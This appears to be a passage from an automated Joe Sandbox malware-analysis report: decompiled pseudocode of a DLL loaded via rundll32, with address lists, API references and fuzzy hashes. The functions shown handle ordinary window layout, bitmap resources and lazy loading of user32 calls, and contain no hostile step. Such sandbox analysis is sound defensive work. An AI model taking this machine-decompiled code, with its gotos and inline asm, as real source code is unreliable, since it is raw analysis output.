							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
							goto L71;
						}
						_t221 =  *(_t341 + 0x7c);
						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
						} else {
							_t225 = 6;
						}
						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
						E100086B2( &_v68, _v36, _v32, _v52, _v48);
						GetWindowRect( *(_t341 + 0x1c),  &_v84);
						E10028E5A(_t297,  &_v84);
						if(_a12 == _t334) {
							_t233 = _v84.top;
							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t334, _t233 - _v68.top);
							}
							_t234 = _v68.bottom;
							_t319 = _v40;
							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
								_t256 = _v32;
								if(_t325 > _t256) {
									_t256 = _t325;
								}
								OffsetRect( &_v68, _t334, _t256 - _v68.top);
							}
							if(_v12 == _t334) {
								if(_v68.top < _v40 -  *0x1004efa4) {
									goto L44;
								}
								_t247 = _v8;
								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x1004efa4; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
								L44:
								if(EqualRect( &_v68,  &_v84) == 0) {
									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t341 = _v20;
										_t334 = 0;
									}
									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
								}
								_v32 = _v68.top -  *0x1004efa4 + _v48;
								_t243 = _v52;
								if(_v16 > _t243) {
									goto L52;
								} else {
									_v16 = _t243;
									goto L51;
								}
							}
						} else {
							_t263 = _v84.left;
							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t263 - _v68.left, _t334);
							}
							_t264 = _v68.right;
							_t326 = _v44;
							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
								L22:
								if(_v12 == _t334) {
									if(_v68.left < _v44 -  *0x1004efa0) {
										L27:
										if(EqualRect( &_v68,  &_v84) == 0) {
											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t341 = _v20;
												_t334 = 0;
											}
											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
										}
										_v36 = _v52 -  *0x1004efa0 + _v68.left;
										_t273 = _v48;
										if(_v16 <= _t273) {
											_v16 = _t273;
										}
										goto L52;
									}
									_t277 = _v8;
									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
										goto L27;
									} else {
										L56:
										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
										_v12 = 1;
										goto L58;
									}
								}
								_t280 =  *0x1004efa0; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
								goto L27;
							} else {
								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
								_t287 = _v36;
								if(_t329 > _t287) {
									_t287 = _t329;
								}
								OffsetRect( &_v68, _t287 - _v68.left, _t334);
								goto L22;
							}
						}
						L71:
						_v8 = _v8 + 1;
					} while (_v8 <  *(_t297 + 0x9c));
					goto L72;
				}
			}























































                                                                        0x1002d2eb
                                                                        0x1002d2ee
                                                                        0x1002d302
                                                                        0x1002d338
                                                                        0x1002d344
                                                                        0x1002d347
                                                                        0x1002d304
                                                                        0x1002d30c
                                                                        0x1002d30d
                                                                        0x1002d30e
                                                                        0x1002d315
                                                                        0x1002d316
                                                                        0x1002d322
                                                                        0x1002d325
                                                                        0x1002d325
                                                                        0x1002d34a
                                                                        0x1002d352
                                                                        0x1002d355
                                                                        0x1002d358
                                                                        0x1002d36b
                                                                        0x1002d35a
                                                                        0x1002d35a
                                                                        0x1002d35a
                                                                        0x1002d36e
                                                                        0x1002d375
                                                                        0x1002d378
                                                                        0x1002d385
                                                                        0x1002d388
                                                                        0x1002d38b
                                                                        0x1002d38e
                                                                        0x1002d391
                                                                        0x1002d6fd
                                                                        0x1002d703
                                                                        0x1002d70d
                                                                        0x1002d70d
                                                                        0x1002d717
                                                                        0x1002d728
                                                                        0x1002d731
                                                                        0x1002d73b
                                                                        0x1002d743
                                                                        0x1002d743
                                                                        0x1002d73b
                                                                        0x1002d749
                                                                        0x1002d753
                                                                        0x1002d75b
                                                                        0x1002d75b
                                                                        0x1002d753
                                                                        0x1002d75e
                                                                        0x1002d765
                                                                        0x1002d76b
                                                                        0x1002d770
                                                                        0x1002d397
                                                                        0x1002d397
                                                                        0x1002d3a4
                                                                        0x1002d3ac
                                                                        0x1002d3b6
                                                                        0x1002d3b8
                                                                        0x1002d682
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d684
                                                                        0x1002d684
                                                                        0x1002d689
                                                                        0x1002d68e
                                                                        0x1002d6c6
                                                                        0x1002d6cb
                                                                        0x1002d6ce
                                                                        0x1002d6d0
                                                                        0x1002d6d0
                                                                        0x1002d6d3
                                                                        0x1002d6d9
                                                                        0x1002d6db
                                                                        0x1002d6db
                                                                        0x1002d6de
                                                                        0x1002d6e5
                                                                        0x1002d690
                                                                        0x1002d699
                                                                        0x1002d69b
                                                                        0x1002d6a1
                                                                        0x1002d6a4
                                                                        0x1002d6a6
                                                                        0x1002d6a6
                                                                        0x1002d6ac
                                                                        0x1002d6ae
                                                                        0x1002d6ae
                                                                        0x1002d6b1
                                                                        0x1002d6b8
                                                                        0x1002d6b8
                                                                        0x1002d6e8
                                                                        0x1002d6e8
                                                                        0x00000000
                                                                        0x1002d689
                                                                        0x1002d3ca
                                                                        0x1002d61a
                                                                        0x1002d61d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d623
                                                                        0x1002d62b
                                                                        0x00000000
                                                                        0x1002d62b
                                                                        0x1002d3d0
                                                                        0x1002d3d5
                                                                        0x1002d3e7
                                                                        0x1002d3ec
                                                                        0x1002d3db
                                                                        0x1002d3dd
                                                                        0x1002d3dd
                                                                        0x1002d3fa
                                                                        0x1002d40f
                                                                        0x1002d41b
                                                                        0x1002d427
                                                                        0x1002d42f
                                                                        0x1002d540
                                                                        0x1002d546
                                                                        0x1002d559
                                                                        0x1002d559
                                                                        0x1002d55f
                                                                        0x1002d562
                                                                        0x1002d567
                                                                        0x1002d57a
                                                                        0x1002d57c
                                                                        0x1002d581
                                                                        0x1002d583
                                                                        0x1002d583
                                                                        0x1002d58e
                                                                        0x1002d58e
                                                                        0x1002d597
                                                                        0x1002d642
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d648
                                                                        0x1002d64d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002d59d
                                                                        0x1002d59d
                                                                        0x1002d5af
                                                                        0x1002d5b2
                                                                        0x1002d5b8
                                                                        0x1002d5c8
                                                                        0x1002d5d0
                                                                        0x1002d5e7
                                                                        0x1002d5e8
                                                                        0x1002d5e9
                                                                        0x1002d5ea
                                                                        0x1002d5eb
                                                                        0x1002d5ee
                                                                        0x1002d5ee
                                                                        0x1002d5fb
                                                                        0x1002d5fb
                                                                        0x1002d60c
                                                                        0x1002d60f
                                                                        0x1002d615
                                                                        0x00000000
                                                                        0x1002d617
                                                                        0x1002d617
                                                                        0x00000000
                                                                        0x1002d617
                                                                        0x1002d615
                                                                        0x1002d435
                                                                        0x1002d435
                                                                        0x1002d43b
                                                                        0x1002d44e
                                                                        0x1002d44e
                                                                        0x1002d454
                                                                        0x1002d457
                                                                        0x1002d45c
                                                                        0x1002d489
                                                                        0x1002d48c
                                                                        0x1002d4b7
                                                                        0x1002d4d5
                                                                        0x1002d4e5
                                                                        0x1002d4ed
                                                                        0x1002d504
                                                                        0x1002d505
                                                                        0x1002d506
                                                                        0x1002d507
                                                                        0x1002d508
                                                                        0x1002d50b
                                                                        0x1002d50b
                                                                        0x1002d518
                                                                        0x1002d518
                                                                        0x1002d529
                                                                        0x1002d52c
                                                                        0x1002d532
                                                                        0x1002d538
                                                                        0x1002d538
                                                                        0x00000000
                                                                        0x1002d532
                                                                        0x1002d4b9
                                                                        0x1002d4be
                                                                        0x00000000
                                                                        0x1002d668
                                                                        0x1002d668
                                                                        0x1002d676
                                                                        0x1002d67b
                                                                        0x00000000
                                                                        0x1002d67b
                                                                        0x1002d4be
                                                                        0x1002d48e
                                                                        0x1002d4a0
                                                                        0x1002d4a3
                                                                        0x00000000
                                                                        0x1002d466
                                                                        0x1002d46f
                                                                        0x1002d471
                                                                        0x1002d476
                                                                        0x1002d478
                                                                        0x1002d478
                                                                        0x1002d483
                                                                        0x00000000
                                                                        0x1002d483
                                                                        0x1002d45c
                                                                        0x1002d6eb
                                                                        0x1002d6eb
                                                                        0x1002d6f1
                                                                        0x00000000
                                                                        0x1002d397

                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 1002D2FA
                                                                        • GetClientRect.USER32 ref: 1002D338
                                                                        • BeginDeferWindowPos.USER32(?), ref: 1002D365
                                                                        • GetWindowRect.USER32 ref: 1002D41B
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                        • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                        • EqualRect.USER32 ref: 1002D4DD
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                        • EqualRect.USER32 ref: 1002D5C0
                                                                        • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                        • SetRectEmpty.USER32(?), ref: 1002D717
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                        • String ID:
                                                                        • API String ID: 3160784657-0
                                                                        • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                        • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B597 Relevance: 21.1, APIs: 14, Instructions: 136windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t54;
				signed int _t56;
				struct HDC__* _t65;
				struct HBITMAP__* _t66;
				struct HDC__* _t70;
				void* _t78;
				int* _t80;
				int _t81;
				signed int _t84;
				signed int _t89;
				void* _t102;
				struct HDC__* _t103;
				BITMAPINFO* _t105;

				_t53 = LoadResource(_a4, _a8);
				_v20 = _t53;
				if(_t53 == 0) {
					return _t53;
				}
				_t54 = LockResource(_t53);
				_t78 = _t54;
				_v12 = _t78;
				if(_t78 == 0) {
					L17:
					return _t54;
				}
				_t99 =  *_t78 + 0x40;
				_t54 = E100107B6( *_t78 + 0x40);
				_t105 = _t54;
				if(_t105 == 0) {
					L16:
					goto L17;
				} else {
					E10011440(_t105, _t78, _t99);
					_t102 = _t105 + _t105->bmiHeader;
					_a8 = _a8 & 0x00000000;
					do {
						_t84 =  *(_t102 + _a8 * 4);
						_t56 = 0;
						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
							_t56 = _t56 + 1;
							if(_t56 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t80 = 0x1003f064 + _t56 * 8;
							_v8 = _t80;
							_a4 = GetSysColor( *_t80) & 0x000000ff;
							_a4 = GetSysColor( *_t80) << 8;
							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
							__eflags = _t89;
							 *(_t102 + _a8 * 4) = _t89;
						} else {
							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
							if(__eflags != 0) {
								 *(_t102 + _a8 * 4) = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t103 = _t105->bmiHeader.biWidth;
					_t81 = _t105->bmiHeader.biHeight;
					_a4 = _t103;
					_a8 = _t81;
					_t65 = GetDC(0);
					_a12 = _t65;
					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
					_v8 = _t66;
					if(_t66 != 0) {
						_t70 = CreateCompatibleDC(_a12);
						_t81 = SelectObject;
						_t103 = _t70;
						_v16 = SelectObject(_t103, _v8);
						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
						SelectObject(_t103, _v16);
						DeleteDC(_t103);
					}
					ReleaseDC(0, _a12);
					_push(_t105);
					E100107C8(_t81, _t103, _t105, 0);
					FreeResource(_v20);
					_t54 = _v8;
					goto L16;
				}
			}

























                                                                        0x1002b5a3
                                                                        0x1002b5ab
                                                                        0x1002b5ae
                                                                        0x1002b71c
                                                                        0x1002b71c
                                                                        0x1002b5b6
                                                                        0x1002b5bc
                                                                        0x1002b5c0
                                                                        0x1002b5c3
                                                                        0x1002b71a
                                                                        0x00000000
                                                                        0x1002b71a
                                                                        0x1002b5cd
                                                                        0x1002b5d1
                                                                        0x1002b5d6
                                                                        0x1002b5db
                                                                        0x1002b718
                                                                        0x00000000
                                                                        0x1002b5e1
                                                                        0x1002b5e4
                                                                        0x1002b5ee
                                                                        0x1002b5f0
                                                                        0x1002b5f4
                                                                        0x1002b5f7
                                                                        0x1002b5fa
                                                                        0x1002b5fc
                                                                        0x1002b605
                                                                        0x1002b609
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002b60b
                                                                        0x1002b60d
                                                                        0x1002b611
                                                                        0x1002b629
                                                                        0x1002b632
                                                                        0x1002b640
                                                                        0x1002b655
                                                                        0x1002b667
                                                                        0x1002b667
                                                                        0x1002b66c
                                                                        0x1002b613
                                                                        0x1002b613
                                                                        0x1002b61b
                                                                        0x1002b620
                                                                        0x1002b620
                                                                        0x1002b61b
                                                                        0x1002b66f
                                                                        0x1002b66f
                                                                        0x1002b672
                                                                        0x1002b67c
                                                                        0x1002b67f
                                                                        0x1002b684
                                                                        0x1002b687
                                                                        0x1002b68a
                                                                        0x1002b693
                                                                        0x1002b696
                                                                        0x1002b69e
                                                                        0x1002b6a1
                                                                        0x1002b6a6
                                                                        0x1002b6af
                                                                        0x1002b6b5
                                                                        0x1002b6ca
                                                                        0x1002b6e7
                                                                        0x1002b6f1
                                                                        0x1002b6f4
                                                                        0x1002b6f4
                                                                        0x1002b6ff
                                                                        0x1002b705
                                                                        0x1002b706
                                                                        0x1002b70f
                                                                        0x1002b715
                                                                        0x00000000
                                                                        0x1002b715

                                                                        APIs
                                                                        • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                        • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                        • GetSysColor.USER32(00000000), ref: 1002B635
                                                                        • GetSysColor.USER32(00000000), ref: 1002B643
                                                                        • GetSysColor.USER32(00000000), ref: 1002B658
                                                                        • GetDC.USER32(00000000), ref: 1002B68A
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                        • SelectObject.GDI32(00000000,?), ref: 1002B6B8
                                                                        • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                        • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                        • DeleteDC.GDI32(00000000), ref: 1002B6F4
                                                                        • ReleaseDC.USER32 ref: 1002B6FF
                                                                        • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 2552574679-0
                                                                        • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                        • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10019D1D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1004f824 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1004f830; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1004f828; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1004f82c; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1004f824(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1004f3ec < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1004f824 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1004f3e0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1004f834 = _t26;
						if(_t26 != 0) {
							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}















                                                                        0x10019d24
                                                                        0x10019d26
                                                                        0x10019d2e
                                                                        0x10019d9d
                                                                        0x10019d9d
                                                                        0x10019da4
                                                                        0x10019de2
                                                                        0x10019de2
                                                                        0x10019de9
                                                                        0x10019ded
                                                                        0x10019df1
                                                                        0x10019df3
                                                                        0x10019dfa
                                                                        0x10019dff
                                                                        0x10019dff
                                                                        0x10019dfa
                                                                        0x10019df1
                                                                        0x10019e01
                                                                        0x00000000
                                                                        0x10019e0b
                                                                        0x10019da6
                                                                        0x10019daa
                                                                        0x10019dc9
                                                                        0x10019dd0
                                                                        0x10019ddc
                                                                        0x10019dd2
                                                                        0x10019dd2
                                                                        0x10019dd2
                                                                        0x00000000
                                                                        0x10019dd0
                                                                        0x10019daf
                                                                        0x10019db0
                                                                        0x10019db5
                                                                        0x10019db6
                                                                        0x10019db8
                                                                        0x10019dc1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019dc1
                                                                        0x10019d3b
                                                                        0x10019d3f
                                                                        0x10019dd8
                                                                        0x00000000
                                                                        0x10019dd8
                                                                        0x10019d51
                                                                        0x10019d55
                                                                        0x10019d5a
                                                                        0x00000000
                                                                        0x10019d5c
                                                                        0x10019d6a
                                                                        0x10019d78
                                                                        0x10019d7d
                                                                        0x10019d85
                                                                        0x10019d89
                                                                        0x10019d8e
                                                                        0x10019d98
                                                                        0x10019d98
                                                                        0x10019d8e
                                                                        0x00000000
                                                                        0x10019d7d

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad
                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                        • API String ID: 2238633743-1612076079
                                                                        • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                        • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10039B26 Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E10039B26(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011BF0(0x1003b377, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10011C50(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F77E(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
